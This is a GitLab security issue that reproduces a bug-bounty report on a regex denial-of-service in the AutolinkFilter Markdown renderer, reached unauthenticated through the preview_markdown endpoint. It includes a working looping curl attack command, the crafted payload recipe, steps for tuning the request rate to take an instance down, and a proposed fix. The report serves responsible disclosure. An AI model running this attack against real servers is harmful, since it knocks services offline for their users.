ReDoS via AutolinkFilter in any Markdown fields
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #1959727](https://hackerone.com/reports/1959727)** by `ryhmnlfj` on 2023-04-24, assigned to @rshambhuni:
[Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)
## Report
#### Summary
I found a server-side ReDoS via `AutolinkFilter` that affects any Markdown field.
An attacker can take down the GitLab instance by sending **unauthenticated requests** containing a crafted payload to the `preview_markdown` endpoint.
#### Preparation before reproducing the bug
Please install the command line tools `ruby` and `curl` on your computer.
Also, please download `AutolinkFilter_ReDoS_payload.json` attached to this report.
These will be used in step 11 of the "Steps to reproduce" section.
And most importantly, please prepare a GitLab instance that you can use personally.
**DO NOT try to reproduce this bug against `gitlab.com` or other public instances.**
#### Steps to reproduce
1. Set up and launch your GitLab instance, and create a new account on it.
2. Sign in to the account you created in step 1.
3. Create a new **public group** and make a note of **the public group name** at this time.
At the same time, make a note of **the base URL with scheme** shown in "Group URL".

4. Sign out as you will be accessing as an unauthenticated user in the following steps.
5. After launching your browser's developer tools, browse to the **public group** you created in step 3 as an unauthenticated user.
6. Check the HTML rendered in step 5 and take a note of the content of `csrf-token` at this time.

7. Check the request sent to your GitLab instance in step 5 and take note of the value of `_gitlab_session` at this time.

8. Close your browser and open a command console.
9. Let's construct the command to demonstrate the ReDoS. Replace each string in the command template according to the replacement table.
* Command template:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:[CSRF_TOKEN_VALUE] --header Cookie:_gitlab_session=[SESSION_VALUE] --data [@]AutolinkFilter_ReDoS_payload.json [BASE_URL_WITH_SCHEME]groups/[PUBLIC_GROUP_NAME]/preview_markdown"); sleep 1; end'
```
* Replacement table:
| String in the command template | Replace with |
|---------------------------------|------------------------------------------------|
| `[CSRF_TOKEN_VALUE]` | the content of `csrf-token` noted in step 6 |
| `[SESSION_VALUE]` | the value of `_gitlab_session` noted in step 7 |
| `[BASE_URL_WITH_SCHEME]` | **the base URL with scheme** noted in step 3 |
| `[PUBLIC_GROUP_NAME]` | **the public group name** noted in step 3 |
For reference, here's an example in my local environment:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:E_NhtPEqA7IpGGSH0jgsfRtruz5fAeeqRxQgBn-kl2mCkdxxBHP4HC9YdK6_mDdZqxCkhzkjSzESZOvAGwJQPQ --header Cookie:_gitlab_session=26c454aeadefc013a10a0fdddabcfd12 --data [@]AutolinkFilter_ReDoS_payload.json http://my-gitlab-h1.test/groups/public_group_for_test/preview_markdown"); sleep 1; end'
```
10. Change the current directory of the command console to the directory where `AutolinkFilter_ReDoS_payload.json` is saved.
11. Run the command constructed in step 9 in the command console, and confirm that CPU usage on the instance rises significantly.
For reference, when I ran the above command, the CPU resource of my instance with 16 CPU cores and 32GB of memory was quickly exhausted.

In an instance with performance close to the [1k Reference Architecture (with 8 CPU cores, 7.2GB memory)](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html), this CPU resource consumption causes noticeable performance degradation in tens of seconds, and visibly delays response to all other users.

Unless the crafted command is interrupted, this performance degradation will continue and get worse until the instance becomes completely unresponsive.
_NOTE: If you can confirm a surge in CPU usage at step 11, that's enough confirmation that this bug is a valid ReDoS vulnerability, based on past valid reports._
_NOTE 2: This crafted command will keep sending requests until you force it to stop. Please be sure to terminate the command after confirming the vulnerability._
###### Details about the command constructed in step 9:
The executed command sends 1 request per second, and each request that triggers the ReDoS exhausts the resources of 1 CPU core.
The GitLab instance has the default timeout of 60 seconds per request. However, because the load per request is too high, there are many worker processes that do not finish processing even after the timeout has passed.
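The load described above can be estimated with a back-of-the-envelope model. This is only a sketch under a simplifying assumption that is not measured in this report: every request pins exactly one core for the full 60-second timeout. The method names are hypothetical, and real behavior also depends on how many web workers the instance runs.

```ruby
# Rough model (assumption: one request keeps one core busy until the timeout).
# Cores demanded once the request rate reaches a steady state.
def cores_demanded(rps:, seconds_per_request:)
  (rps * seconds_per_request).ceil
end

# Seconds until every core has a request pinned to it.
def seconds_until_saturated(cores:, rps:)
  cores / rps.to_f
end

puts cores_demanded(rps: 1, seconds_per_request: 60) # 60
puts seconds_until_saturated(cores: 16, rps: 1)      # 16.0
puts seconds_until_saturated(cores: 8, rps: 1)       # 8.0
```

Under this model, 1 request per second asks for far more cores than either test machine has, which is consistent with requests piling up past the timeout.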
#### Additional information to confirm this vulnerability meets the `A:H` criteria
**_IMPORTANT NOTE: This section contains additional information to confirm that this vulnerability meets the criteria for `A:H`. Please use this information after triage, as this section contains time-consuming steps and may be an over-verification of whether this report is valid._**
If the GitLab instance is attacked at a well-tuned RPS (requests per second) rate for a reasonable amount of time, then for as long as the attack continues, the instance takes 60+ seconds to process every single request.
This indicates that timeouts are not working well under heavy load.
As a result, `500 error` will be returned for each and every request.

I describe below how to attack at a well-tuned RPS rate for a reasonable amount of time **by using the command constructed in step 9 of the "Steps to reproduce" section** of this report.
1. Before running the constructed command, maintain a separate session as an authenticated user by signing in to the instance with a different browser from the one used to obtain the unauthenticated user's CSRF token and session.
2. Iterate on executing the constructed command and adjusting the RPS rate.
The constructed command will display the PIDs of the spawned `curl` processes and the responses from the instance in the console.
Please adjust the RPS rate as described below so that 1 or 2 PIDs and several `500 error` responses are alternately displayed.
* We can adjust the RPS rate by changing the `sleep` value at the end of the command. For example, changing to `sleep 1;` will result in `RPS = 1`, `sleep 0.5;` will result in `RPS = 2`, and `sleep 2;` will result in `RPS = 0.5`.
* We need to adjust the RPS rate so that [it does not exceed the "Test RPS rates" (described in "Clarifying notes")](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes). As an example, for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html), the "Test RPS rate" is 2 RPS.
_NOTE: Since the default timeout is 60 seconds, we need to wait a few minutes after executing the command before the PIDs and error responses are displayed alternately. It is not a problem if several PIDs are occasionally displayed in a row, but if the alternation clearly is not happening, please stop the command and adjust the RPS rate._
3. **With the tuned command still running**, visit any page on the instance with the authenticated user's session maintained in step 1 of this section.
And check if the `500 error` is returned after a response delay of 60+ seconds.
After you start getting `500 errors` for authenticated requests, wait tens of minutes and you'll start getting `500 errors` for unauthenticated requests and requests to the API.
_NOTE: This behavior seems to occur because handling authenticated requests tends to be more complex than handling unauthenticated requests._
When I tested it on my instance, it took about 10-20 minutes at a rate of 1 RPS for my instance (16 CPU cores and 32GB of memory) to reach the above DoS state.
Additionally, in a pipeline that was running while the instance was in the above DoS state, the jobs failed with a timeout because the runner was unable to communicate with the instance, and the subsequent jobs in the pipeline were not run.


Also, when I looked at the runner logs in this state, I could see that the runner was failing to pick up the jobs.
```
$ sudo docker logs my_runner_container
[...snip...]
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
```
(Since I was using the [`gitlab/gitlab-runner:alpine` image](https://docs.gitlab.com/runner/install/docker.html#docker-images) for testing, I ran `docker logs` command to see the runner logs.)
These observations show that the instance has been completely taken down, so this vulnerability fully meets the [`A:H` criteria](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes).
#### What is the current bug behavior?
The vulnerable regular expression exists in the following part of the source code.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.11.0-ee/lib/banzai/filter/autolink_filter.rb#L88
```ruby
def autolink_match(match)
...
# Remove any trailing HTML entities and store them for appending
# outside the link element. The entity must be marked HTML safe in
# order to be output literally rather than escaped.
match.gsub!(/((?:&[\w#]+;)+)\z/, '')
```
At first glance, matching this regex pattern with the string `http://&&&&&& ... &&&&&&x` in `AutolinkFilter_ReDoS_payload.json` does not appear to cause backtracking.
However, as a result of sanitizing and escaping this string through the Markdown pipeline, the string passed to the variable `match` is as follows:
```
http://&amp;&amp;&amp;&amp;&amp;&amp; ... &amp;&amp;&amp;&amp;&amp;&amp;x
```
Matching this string with the pattern `/((?:&[\w#]+;)+)\z/` causes severe backtracking.
_NOTE: The crafted payload in `AutolinkFilter_ReDoS_payload.json` can be easily generated with the Ruby code `"http://" + "&" * 1_000_000 + "x"`._
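The growth in matching time can be observed locally, without any GitLab instance, using deliberately small inputs. The following is a minimal sketch, assuming the escaped form of the payload is `&amp;` repeated many times; the helper name `escaped_payload` and the sizes are illustrative only. Newer Ruby versions include regex-engine optimizations that may flatten the curve, so the effect is most visible on a Ruby close to the 3.0.6 used in this report.

```ruby
require 'benchmark'

# The pattern quoted from autolink_filter.rb above.
TRAILING_ENTITIES = /((?:&[\w#]+;)+)\z/

# Hypothetical helper: the payload as it looks after escaping (assumption).
def escaped_payload(count)
  "http://" + "&amp;" * count + "x"
end

# Doubling the input should roughly quadruple the time when the engine
# retries the entity run from every "&" and fails at the trailing "x".
[500, 1_000, 2_000].each do |count|
  input = escaped_payload(count)
  seconds = Benchmark.realtime { input.gsub(TRAILING_ENTITIES, '') }
  puts format('%5d entities: %.4f s', count, seconds)
end
```

The string never ends in an entity, so every attempt fails only after scanning to the final `x`, which is what makes the total work grow much faster than the input length.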
#### What is the expected correct behavior?
We should either rewrite the vulnerable regex pattern `/((?:&[\w#]+;)+)\z/` so that it doesn't cause severe backtracking, or write code that does the equivalent without using regular expressions.
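As an illustration of the second option, here is a minimal sketch of a regex-free equivalent that scans backwards from the end of the string in a single pass. It is not GitLab's actual fix; `split_trailing_entities` and `entity_name_byte?` are hypothetical names, and the sketch assumes UTF-8 input so that ASCII bytes never occur inside multibyte characters.

```ruby
# True for the bytes matched by [\w#] in the original pattern:
# 0-9, A-Z, a-z, "_" and "#".
def entity_name_byte?(byte)
  case byte
  when 0x30..0x39, 0x41..0x5A, 0x61..0x7A, 0x5F, 0x23 then true
  else false
  end
end

# Hypothetical helper: returns [body, trailing_entities].
# Each byte is inspected at most once, so the work is linear in the input.
def split_trailing_entities(text)
  cut = text.bytesize # byte offset where the trailing entity run starts

  loop do
    # An entity must end with ";" right before the current cut.
    break unless cut >= 3 && text.getbyte(cut - 1) == 0x3B

    # Walk left over the entity name.
    i = cut - 2
    i -= 1 while i >= 0 && entity_name_byte?(text.getbyte(i))

    # Require at least one name byte, preceded by "&".
    break unless i >= 0 && i < cut - 2 && text.getbyte(i) == 0x26

    cut = i
  end

  [text.byteslice(0, cut), text.byteslice(cut, text.bytesize - cut)]
end

body, entities = split_trailing_entities("http://example.com&amp;&lt;")
puts body     # http://example.com
puts entities # &amp;&lt;
```

Because an entity name cannot contain `&` or `;`, the backward scan is unambiguous and stops at the first byte that cannot belong to an entity, so an input ending in `x` is rejected after one comparison.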
#### Relevant logs and/or screenshots
I put references to the screenshots at the appropriate places in this report.
I also attach the stack trace captured when one request was forcefully stopped after 60+ seconds.
```
Rack::Timeout::RequestTimeoutException (Request ran for longer than 60000ms ):
lib/banzai/filter/autolink_filter.rb:88:in `autolink_match'
lib/banzai/filter/autolink_filter.rb:124:in `block in autolink_filter'
lib/gitlab/string_range_marker.rb:41:in `block in mark'
lib/gitlab/string_range_marker.rb:37:in `each'
lib/gitlab/string_range_marker.rb:37:in `each_with_index'
lib/gitlab/string_range_marker.rb:37:in `mark'
lib/gitlab/string_regex_marker.rb:18:in `mark'
lib/banzai/filter/autolink_filter.rb:123:in `autolink_filter'
lib/banzai/filter/autolink_filter.rb:64:in `block in call'
lib/banzai/filter/autolink_filter.rb:59:in `call'
lib/banzai/pipeline/base_pipeline.rb:23:in `block (2 levels) in singleton class'
lib/banzai/renderer.rb:130:in `render_result'
lib/banzai/renderer.rb:166:in `cacheless_render'
lib/banzai/renderer.rb:30:in `render'
lib/banzai/renderer.rb:120:in `block in cache_collection_render'
lib/banzai/renderer.rb:119:in `each'
lib/banzai/renderer.rb:119:in `cache_collection_render'
lib/banzai/reference_extractor.rb:33:in `html_documents'
lib/banzai/reference_extractor.rb:18:in `references'
lib/gitlab/reference_extractor.rb:24:in `references'
lib/gitlab/reference_extractor.rb:43:in `block (2 levels) in <class:ReferenceExtractor>'
app/services/preview_markdown_service.rb:33:in `find_user_references'
app/services/preview_markdown_service.rb:6:in `execute'
app/controllers/concerns/preview_markdown.rb:8:in `preview_markdown'
ee/lib/gitlab/ip_address_state.rb:10:in `with'
ee/app/controllers/ee/application_controller.rb:45:in `set_current_ip_address'
app/controllers/application_controller.rb:524:in `set_current_admin'
lib/gitlab/session.rb:11:in `with_session'
app/controllers/application_controller.rb:515:in `set_session_storage'
lib/gitlab/i18n.rb:107:in `with_locale'
app/controllers/application_controller.rb:508:in `set_locale'
app/controllers/application_controller.rb:499:in `set_current_context'
lib/gitlab/metrics/elasticsearch_rack_middleware.rb:16:in `call'
lib/gitlab/middleware/memory_report.rb:13:in `call'
lib/gitlab/middleware/speedscope.rb:13:in `call'
lib/gitlab/database/load_balancing/rack_middleware.rb:23:in `call'
lib/gitlab/middleware/rails_queue_duration.rb:33:in `call'
lib/gitlab/metrics/rack_middleware.rb:16:in `block in call'
lib/gitlab/metrics/web_transaction.rb:46:in `run'
lib/gitlab/metrics/rack_middleware.rb:16:in `call'
lib/gitlab/jira/middleware.rb:19:in `call'
lib/gitlab/middleware/go.rb:20:in `call'
lib/gitlab/etag_caching/middleware.rb:21:in `call'
lib/gitlab/middleware/query_analyzer.rb:11:in `block in call'
lib/gitlab/database/query_analyzer.rb:37:in `within'
lib/gitlab/middleware/query_analyzer.rb:11:in `call'
lib/gitlab/middleware/multipart.rb:173:in `call'
lib/gitlab/middleware/read_only/controller.rb:50:in `call'
lib/gitlab/middleware/read_only.rb:18:in `call'
lib/gitlab/middleware/same_site_cookies.rb:27:in `call'
lib/gitlab/middleware/basic_health_check.rb:25:in `call'
lib/gitlab/middleware/handle_malformed_strings.rb:21:in `call'
lib/gitlab/middleware/handle_ip_spoof_attack_error.rb:25:in `call'
lib/gitlab/middleware/request_context.rb:21:in `call'
lib/gitlab/middleware/webhook_recursion_detection.rb:15:in `call'
config/initializers/fix_local_cache_middleware.rb:11:in `call'
lib/gitlab/middleware/compressed_json.rb:37:in `call'
lib/gitlab/middleware/rack_multipart_tempfile_factory.rb:19:in `call'
lib/gitlab/middleware/sidekiq_web_static.rb:20:in `call'
lib/gitlab/metrics/requests_rack_middleware.rb:79:in `call'
lib/gitlab/middleware/release_env.rb:13:in `call'
```
#### Output of checks
This bug happens on the official Docker installation of GitLab Enterprise Edition `15.11.0-ee`.
I used `Chromium 112` and `Firefox 112` on Debian 11 to verify this bug.
###### Results of GitLab environment info
Output of `sudo gitlab-rake gitlab:env:info`:
```
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.0.6p216
Gem Version: 3.2.33
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.11
Sidekiq Version:6.5.7
Go Version: unknown
GitLab information
Version: 15.11.0-ee
Revision: 4dce6bc3728
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.8
URL: http://my-gitlab-h1.test
HTTP Clone URL: http://my-gitlab-h1.test/some-group/some-project.git
SSH Clone URL: git@my-gitlab-h1.test:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.18.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
```
#### Impact
By exploiting this ReDoS vulnerability, an unauthenticated attacker could significantly reduce the availability of the entire GitLab instance.
Based on [the policy of GitLab's Bug Bounty Program](https://hackerone.com/gitlab?view_policy=true), past reports, and my research on the impact of this bug, I would suggest the following CVSS score:
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High)
```
I would also like to add some detailed explanations of the notable points in the above score.
* `PR:N` : As described in the "Steps to reproduce" section, this attack can be performed by an unauthenticated attacker.
* `A:H` : This ReDoS attack causes enough load to meet the `A:H` criteria for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html) as stated in [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
More specifically, this attack clearly satisfies the "Clarifying notes" condition in [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
> When evaluating Availability impacts for DoS that require sustained traffic, use the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html). The number of requests must be fewer than the "test request per seconds rates" and cause 10+ seconds of user-perceivable unavailability to rate the impact as `A:H`.
In addition to the above, it is important to note that any feature with Markdown fields is vulnerable to this ReDoS attack.
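For reference, the 7.5 base score suggested above follows from the CVSS v3.1 base-score equations for an unchanged scope. The sketch below hard-codes the metric weights for this one vector; the method and constant names are illustrative and do not come from any GitLab tool.

```ruby
# CVSS v3.1 weights for AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H.
WEIGHTS = { av: 0.85, ac: 0.77, pr: 0.85, ui: 0.85, c: 0.0, i: 0.0, a: 0.56 }.freeze

# Round up to one decimal place, as defined in the CVSS v3.1 specification.
def roundup(value)
  scaled = (value * 100_000).round
  return scaled / 100_000.0 if (scaled % 10_000).zero?

  ((scaled / 10_000) + 1) / 10.0
end

# Base score for Scope: Unchanged.
def base_score(w)
  iss = 1 - (1 - w[:c]) * (1 - w[:i]) * (1 - w[:a])
  impact = 6.42 * iss
  exploitability = 8.22 * w[:av] * w[:ac] * w[:pr] * w[:ui]
  return 0.0 if impact <= 0

  roundup([impact + exploitability, 10].min)
end

puts base_score(WEIGHTS) # 7.5
```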
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [AutolinkFilter_ReDoS_payload.json](https://h1.sec.gitlab.net/a/1d7049a4-6478-40ac-9809-8700cde6cc88/AutolinkFilter_ReDoS_payload.json)
* [create_public_group_updated.png](https://h1.sec.gitlab.net/a/4033c5b2-accc-4274-8204-872e26294bb2/create_public_group_updated.png)
* [csrf_token.png](https://h1.sec.gitlab.net/a/5a13c5cd-41f5-4c52-801c-db23bd2ce6c2/csrf_token.png)
* [session_value.png](https://h1.sec.gitlab.net/a/52306184-265b-41f7-8bbc-58f97b7cf6a7/session_value.png)
* [htop_all_cores_exhausted.png](https://h1.sec.gitlab.net/a/b08c3ee2-15c7-4815-8880-2e7c458246e7/htop_all_cores_exhausted.png)
* [response_delay.png](https://h1.sec.gitlab.net/a/3b7cfbb3-4fbf-4eeb-befc-e45b7d6cf4d2/response_delay.png)
* [500_error.png](https://h1.sec.gitlab.net/a/9ef6372b-81ac-464c-9df6-91c36ca06026/500_error.png)
* [failed_pipeline.png](https://h1.sec.gitlab.net/a/dd2dd2a9-f412-454f-863c-398e22910786/failed_pipeline.png)
* [failed_jobs_timeout.png](https://h1.sec.gitlab.net/a/7d1f61db-0406-4697-acb9-7fcccd5bf965/failed_jobs_timeout.png)
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues